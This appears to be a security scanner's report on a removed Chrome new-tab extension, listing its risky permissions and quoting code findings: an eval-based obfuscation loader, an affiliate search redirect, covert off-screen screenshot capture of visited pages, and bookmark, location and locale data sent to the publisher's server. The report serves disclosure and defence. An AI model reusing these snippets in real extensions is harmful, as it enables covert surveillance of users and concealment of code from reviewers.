i New Tab

ID: hdkdmoacnkphoadmfidlhfdobieblphn

Could be malicious

Extension Info & Metadata

Status
Removed
Version
1.3.70
Size
0.94 MB
Rating
4.4/5
Reviews
613
Users
408,893
Type
Extension
Updated
May 22, 2019
Category
7_productivity
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
https://www.freenewtab.comView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
Yes
Mailbox exists
Yes
Total Extensions
1
Active
0
Obsolete
1
Listed
1
Unlisted
0
Total Users
408,893

EagleGet New Tab, a free new tab extension that make your new tab more productive.

The best Chrome new tab extension.improve your work efficiency ,manage your bookmarks in a brand new way ,visit your favorite websites in a single click,quickly search web history, view Facebook and Gmail notifications in a glance,more features are waiting you to discover, don't miss it, This one is for you! ★ Beautiful custom full screen backgrounds / wallpapers ★ Live customizable weather forecast ★ Easily re-arrange and disable sites ★ Live facebook/gmail notifications / messages so you don't waste time ★ Follow your favorite stocks with live customizable stock tickers ★ Easy access to manage apps, extensions, bookmarks and history ★ Google/bing/yahoo search ★ Top Tracks Daily News from Spotify ★ Top visited websites ★ Multiple layout options, single view and all in one ★ One click the collapse and recently opened tab features. ★ Follow any region news topic We're always working on new features, please use the support page to request features and please leave us a great review if you have a few minutes! Privacy Policy http://www.eagleget.com/privacy-policy/ EULA http://www.eagleget.com/eagleget-user-terms/

Item
Type
Severity
Description
webRequest
Permission
Critical
This permission enables the extension to monitor and analyze all web requests made by the browser. Rated Critical because it can observe all network traffic including sensitive data, track browsing behavior, and gather authentication tokens.
webRequestBlocking
Permission
Critical
This permission allows the extension to intercept, modify, or block any web request in real-time before it reaches its destination. Rated Critical because it can modify sensitive data (like passwords, credit cards) before encryption, redirect traffic to malicious sites, or block security updates.
<all_urls>
Permission
Critical
This permission grants access to all websites without restriction. Rated High because it can access any web content, monitor all web activity, and potentially steal sensitive data across all sites.
Dangerous Permission Combination: cookies,webRequest,identity
Risk Factor
Critical
Allows extensions to intercept web requests, manage cookies, and access identity or certificate-related functionalities, potentially compromising secure access and authentication processes.
Dangerous Permission Combination
Risk Factor
Critical
This extension can intercept, modify, and block web requests in real-time.
geolocation
Permission
High
This permission accesses precise device location. Rated High because it can track user movements, identify physical locations, and compromise user privacy.
topSites
Permission
High
This permission accesses the list of most visited websites. Rated High because it can reveal browsing patterns, identify frequently accessed service, and gather user behavior data.
identity
Permission
High
This permission accesses Chrome identity service and user information. Rated High because it can obtain OAuth tokens, access connected accounts, and impersonate the user in authenticated service.
history
Permission
High
This permission grants access to your complete browsing history. Rated High because it can track all visited websites, reveal sensitive browsing patterns, and expose private information.
webNavigation
Permission
High
This permission enables monitoring of all browser navigation events and transitions. Rated High because it can track every page visit, navigation method, and browsing pattern, potentially exposing sensitive browsing behavior and user activities.
cookies
Permission
High
This permission provides full access to read and modify browser cookies. Rated High because it can steal session tokens, modify authentication cookies, and compromise accounts across websites.
Dangerous Permission Combination: history,tabs,webNavigation,topSites
Risk Factor
High
Enables extensive monitoring and access to sensitive aspects of your digital activities.
Dangerous Permission Combination: cookies,history,bookmarks
Risk Factor
High
Allows access to location data, personal identifiers, and sensitive browsing information, potentially exposing personal and confidential user data.
Dangerous Permission Combination: background,webRequest,storage
Risk Factor
High
Enables extensions to operate in the background, intercept web requests, and manage privacy settings and browsing data, facilitating concealed actions and potentially undetected modifications.
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:• 15% increase: Older manifest version lacks modern security controls
background
Permission
Medium
This permission allows continuous background operation. Rated Medium because it can perform actions without user awareness, consume system resources, and maintain persistent connections.
management
Permission
Medium
This permission manages other installed extensions. Rated Medium because it can enable/disable other extensions and modify their settings, with changes being visible to users.
unlimitedStorage
Permission
Medium
This permission removes storage quota restrictions. Rated Medium because it can store large amounts of user data without limits, potentially impacting browser performance and storing extensive tracking data.
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.
declarativeContent
Permission
Medium
This permission controls extension activation based on page content. Rated Medium because it can monitor page content matches and selectively activate extension features.
Older Manifest Version
Risk Factor
Medium
This extension uses Manifest Version 2
bookmarks
Permission
Low
This permission manages browser bookmarks and folders. Rated Low because it can only modify bookmark data, which is not sensitive and changes are visible to users.
alarms
Permission
Low
This permission schedules periodic tasks. Rated Low because it can only trigger events at specified times without access to sensitive data.
notifications
Permission
Low
This permission displays system notifications. Rated Low because it can only show user-visible notifications without accessing system data.
http://*/
Permission
Unknown
No classification available for this permission.
https://*/
Permission
Unknown
No classification available for this permission.
chrome://favicon/
Permission
Unknown
No classification available for this permission.

The entire 96KB itab.js is wrapped in a custom eval()-based deobfuscator that decodes a backtick-compressed string at runtime. This technique is deliberately used to hide the file's true behavior from static analysis tools and human reviewers. The CSP explicitly permits 'unsafe-eval' to enable this pattern, and common.js uses the identical obfuscator.

script/itab.js (Line 1)
eval((function(x) {      var d = "";      var p = 0;      while (p < x.length) {        if (x.charAt(p) != "`") d += x.charAt(p++);        else {          var l = x.charCodeAt(p + 3) - 28;          if (l > 4) d += d.substr(d.length - x.charCodeAt(p + 1) * 96 - x.charCodeAt(p + 2) + 3104 - l, l);          else d += "`";          p += 4        }      }      return d    })("var lang=\"en\";$(function(){...

The Bing search engine entry is silently replaced with 'http://www.hbsohu.xyz/Results.aspx?GD=SY...&Source=69&UM=8' — a known affiliate/tracking domain. Every Bing search query typed into the extension's search bar is redirected through this third-party URL containing affiliate tracking parameters (Source, UM, GD), monetizing user searches without disclosure. The obfuscated URL also contains partially-encoded segments to evade static detection.

script/itab.js (Line 1)
searchMaps = {  bing: {    type: "bing",    desc: "Bing",    url: " http://www.hbsohu.xyz/Results.aspx?GD=SY...19&Source=69&UM=8&n=2001&q=%s",    default_url: "bing.com/..."  }}

The content script runs on every http/https page, sends the current page URL to the background script, receives back a screenshot URL, renders it onto an HTML5 canvas, and returns the full canvas pixel data (via toDataURL()) and the page URL back to the background. This constitutes a screenshot-of-every-visited-page mechanism running silently across all browsing activity. The 'all_frames: true' declaration means it also runs inside iframes.

script/contentscript.js (Line 1)
chrome.extension.sendMessage({  name: "oncompletes",  url: document.location.href}, function(e) {  if (e) {    var o = e.screenshotUrl,      t = (e.width, e.height),      n = document.createElement("canvas"),      c = new Image;    c.onload = function() {      n.width = $(window).width() / $(window).height() * t, n.height = t, n.getContext("2d").drawImage(c, 0, 0, n.width, n.height);      var e = $(n);      e.data("scrollLeft", $(document.body).scrollLeft()), e.data("scrollTop", $(document.body).scrollTop()), chrome.extension.sendMessage({        name: "screenshot",        url: document.location.href,        img: n.toDataURL()      }, function(e) {})    }, c.src = o  }})

The HiddenCapture class creates a browser window positioned 100,000px off-screen (left:1e5, top:1e5, focused:false) so it is invisible to the user, navigates it to a target URL, resizes it to 1024x768, and uses chrome.tabs.captureVisibleTab() to take a screenshot of the rendered page. The screenshot data URL is then returned via callback and stored to the filesystem. This is a covert page-rendering and screenshot-capture facility operating outside the user's visible viewport.

script/background.js (Line 1)
HiddenCapture = new function() {    ...this.capture = function(a, s) {      ...      var i = {        url: a.url,        focused: !1,        left: 1e5,        top: 1e5,        width: r ? 100 : 1,        height: r ? 100 : 1,        type: "popup"      };chrome.windows.create(i, function(r) {          ...chrome.windows.update(r.id, {              width: 1024,              height: 768            }, function() {              setTimeout(function() {                    chrome.tabs.captureVisibleTab(r.id, function(t) {                      if (clearTimeout(o), chrome.windows.remove(r.id), !t) return console.error("Fail to capture tab ", ...);                      w({                        imgUrl: t,                        screenWidth: a.width                      }, function(t, n) {                        s({                          dataUrl: t,                          title: e.title,                          thumbSize: n                        })                      })                    })

The background listens for 'thumb_hidden_capture' requests, invokes HiddenCaptureQueue to silently capture screenshots of arbitrary URLs, and writes the resulting images to '/snapshot/{id}.{ext}' in persistent storage. A queue system (HiddenCaptureQueue) manages concurrent capture jobs. This infrastructure can capture and persist screenshots of any URL at the direction of the new-tab page UI.

script/background.js (Line 1)
chrome.extension.onRequest.addListener(function(i, t, r) {      "thumb_hidden_capture" == i.name && HiddenCaptureQueue.capture(i, function(e) {        if (i.saveImage) {          var t = l(e.dataUrl),            n = f(t.type);          Storage.FileSystem.write("/snapshot/" + i.id + "." + n, t, function(t, n) {            t || (e.dataUrl = n), r({              result: e            })          })        }      }), "wallpaper" == i.name && ..., "custom_image" == i.name && ...

The weather widget sends the user's city (derived from geolocation or user input) to 'http://plugins.eagleget.com/delivery_zip2.php' over unencrypted HTTP. The endpoint name 'delivery_zip2' is anomalous for a weather API and the server is controlled by the extension publisher. Combined with the geolocation permission, this enables precise location tracking of users.

script/itab.js (Line 1)
$.ajax({      url: "http://plugins.eagleget.com/delivery_zip2.php",      data: {        city: e      },      dataType: "json",      success: function(e) {        if (Array.isArray(e) && 0 < e.length && "string" == typeof e[0].name...a.fcd(a, e);        }      }    }

The extension phones home to 'http://plugins.eagleget.com/index.php' passing 'mt' (content type), 'ned' (navigator.language — user's browser locale), and a version identifier. This endpoint controls what content (news, apps, top sites) is shown on the new tab page and can remotely alter the page's behavior. Sending navigator.language allows user profiling by locale.

script/itab.js (Line 1)
PageDataSource = {    load: function(e) {        ...e.join(",");d_.getCache("http://plugins.eagleget.com/index.php", {            mt: a,            ned: navigator.language          }, timeout: 10000...for(t in data) {            switch ("news" == t...              case "apps": GamePage...            }          }        }

On every popup open, the background retrieves the user's complete bookmarks tree via chrome.bookmarks.getTree() and the full list of recent tabs (with URLs), packaging them into the popup's initial data payload. Both the entire bookmark hierarchy and complete recent browsing history are accessible to the new tab page JavaScript, which also calls multiple external eagleget.com endpoints.

script/background.js (Line 1)
r.on("popupReady", function(t, n) {  var e = {    topPos: settingMachine.topPos,    opened: settingMachine.opened,    settings: settingMachine.windowConfig  };  t.from && "index" == t.from || ga("send", "pageview", "popup"), chrome.bookmarks.getTree(function(t) {    e.bookmarks = t, n(e)  })}), r.on("getRecentTabs", function(t, n) {  n(recent_tabs)})

The obfuscated itab.js invokes chrome.management.setEnabled() (partially visible despite obfuscation) to programmatically enable or disable other installed extensions. This constitutes privilege escalation: a new tab replacement extension should have no need to control other extensions, and this capability can be used to disable security tools or competing extensions.

script/itab.js (Line 1)
chrome.management.setE...` =!`"e-`(n%` _*` W0` B%(e` V.`+("` C>` ? % ` _"TabView` ^ 'selectTab...

The manifest explicitly whitelists 'unsafe-eval' in its Content Security Policy, which is required to execute the eval()-based obfuscation present in itab.js and common.js. Legitimate extensions have no need for unsafe-eval; its presence here is a deliberate measure to enable runtime code execution from obfuscated strings, bypassing normal CSP protections.

manifest.json (Line 30)
{  "content_security_policy": [    "script-src 'self' https://apis.google.com/ chrome-extension://hdkdmoacnkphoadmfidlhfdobieblphn/script/analytics.js chrome-extension://hdkdmoacnkphoadmfidlhfdobieblphn/script/ 'unsafe-eval'",    "object-src 'self'"  ]}

The extension loads personalized 'recommended' content (links, wallpapers, top sites) from plugins.eagleget.com/index.php with a version identifier, locale, and timestamp on every new tab load. This remote content-loading mechanism allows the server operator to modify the links and sponsored content displayed to 408,000+ users at any time, acting as a remote code/content injection vector.

script/itab.js (Line 1)
p_d = {    wpId: "",    iurl: "http://plugins.eagleget.com/index.php",    ...d_.getCache(iurl, Number.MAX_VALUE);e && e.data && (p_d.execShowset(e.s...), Dogear.Links...$.isArray(links) && ...$(window).on("pages:firstPageOnLoad", ..."recommend"; t.accept...d_(...{          rn: Date.now(),          v: api.getVersion(),          mt: e        }...)

Google Analytics is initialized with 'displayfeatures' enabled (ga("require","displayfeatures")), which collects demographic and interest category data from users for advertising purposes. Combined with the extension's access to full browsing history, tabs, and bookmarks, this enables rich behavioral profiling of every user. The GA property UA-36036708-10 is owned by the extension authors.

script/ga.js (Line 1)
! function(e, n, t, a, s, i, o) {  e.GoogleAnalyticsObject = s, e[s] = e[s] || function() {    (e[s].q = e[s].q || []).push(arguments)  }, e[s].l = 1 * new Date, i = n.createElement(t), o = n.getElementsByTagName(t)[0], i.async = 1, i.src = a, o.parentNode.insertBefore(i, o)}(window, document, "script", "chrome-extension://hdkdmoacnkphoadmfidlhfdobieblphn/script/analytics.js", "ga"), setTimeout(function() {  ga("create", "UA-36036708-10", "auto"), ga("require", "displayfeatures"), ga("send", "pageview", "/index.html")}, 2e3);

By severity

Critical5
High6
Medium1
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.3.7012

Files with findings

5 distinct paths — top paths by unique finding count:

  • script/itab.js6
  • script/background.js3
  • manifest.json1
  • script/contentscript.js1
  • script/ga.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Obfuscation
critical
script/itab.js (line 1)The entire 96KB itab.js is wrapped in a custom eval()-based deobfuscator that decodes a backtick-compressed string at runtime. This technique is deliberately used to hide the file's true behavior from static analysis …
2Tracking
critical
script/itab.js (line 1)The Bing search engine entry is silently replaced with 'http://www.hbsohu.xyz/Results.aspx?GD=SY...&Source=69&UM=8' — a known affiliate/tracking domain. Every Bing search query typed into the extension's search bar is…
3Unauthorized Data Collection
critical
script/contentscript.js (line 1)The content script runs on every http/https page, sends the current page URL to the background script, receives back a screenshot URL, renders it onto an HTML5 canvas, and returns the full canvas pixel data (via toDat…
4Unauthorized Data Collection
critical
script/background.js (line 1)The HiddenCapture class creates a browser window positioned 100,000px off-screen (left:1e5, top:1e5, focused:false) so it is invisible to the user, navigates it to a target URL, resizes it to 1024x768, and uses chrome…
5Unauthorized Data Collection
critical
script/background.js (line 1)The background listens for 'thumb_hidden_capture' requests, invokes HiddenCaptureQueue to silently capture screenshots of arbitrary URLs, and writes the resulting images to '/snapshot/{id}.{ext}' in persistent storage…
6Code Injection
high
manifest.json (line 30)The manifest explicitly whitelists 'unsafe-eval' in its Content Security Policy, which is required to execute the eval()-based obfuscation present in itab.js and common.js. Legitimate extensions have no need for unsaf…
7Privilege Escalation
high
script/itab.js (line 1)The obfuscated itab.js invokes chrome.management.setEnabled() (partially visible despite obfuscation) to programmatically enable or disable other installed extensions. This constitutes privilege escalation: a new tab …
8Remote Code Loading
high
script/itab.js (line 1)The extension loads personalized 'recommended' content (links, wallpapers, top sites) from plugins.eagleget.com/index.php with a version identifier, locale, and timestamp on every new tab load. This remote content-loa…
9Unauthorized Data Collection
high
script/itab.js (line 1)The weather widget sends the user's city (derived from geolocation or user input) to 'http://plugins.eagleget.com/delivery_zip2.php' over unencrypted HTTP. The endpoint name 'delivery_zip2' is anomalous for a weather …
10Unauthorized Data Collection
high
script/itab.js (line 1)The extension phones home to 'http://plugins.eagleget.com/index.php' passing 'mt' (content type), 'ned' (navigator.language — user's browser locale), and a version identifier. This endpoint controls what content (news…
11Unauthorized Data Collection
high
script/background.js (line 1)On every popup open, the background retrieves the user's complete bookmarks tree via chrome.bookmarks.getTree() and the full list of recent tabs (with URLs), packaging them into the popup's initial data payload. Both …
12Tracking
medium
script/ga.js (line 1)Google Analytics is initialized with 'displayfeatures' enabled (ga("require","displayfeatures")), which collects demographic and interest category data from users for advertising purposes. Combined with the extension'…
URLs
41
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.w3.org/1999/02/22-rdf-syntax-nshttp://www.w3.org/1999/02/22-rdf-syntax-ns#
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
purl.org/dc/elements/1.1/http://purl.org/dc/elements/1.1/
ns.adobe.com/photoshop/1.0/http://ns.adobe.com/photoshop/1.0/
ns.adobe.com/xap/1.0/mm/http://ns.adobe.com/xap/1.0/mm/
ns.adobe.com/xap/1.0/sType/ResourceEventhttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#
ns.adobe.com/tiff/1.0/http://ns.adobe.com/tiff/1.0/
ns.adobe.com/exif/1.0/http://ns.adobe.com/exif/1.0/
chrome.google.com/webstore/detail/i-new-tab/hdkdmoacnkphoadmfidlhfdobieblphn/reviewshttps://chrome.google.com/webstore/detail/i-new-tab/hdkdmoacnkphoadmfidlhfdobieblphn/reviews
www.freenewtab.com/privacy-policy/https://www.freenewtab.com/privacy-policy/
Showing 1 to 10 of 50 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
1.3.70
Latest
0.94 MB
Malicious
12
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.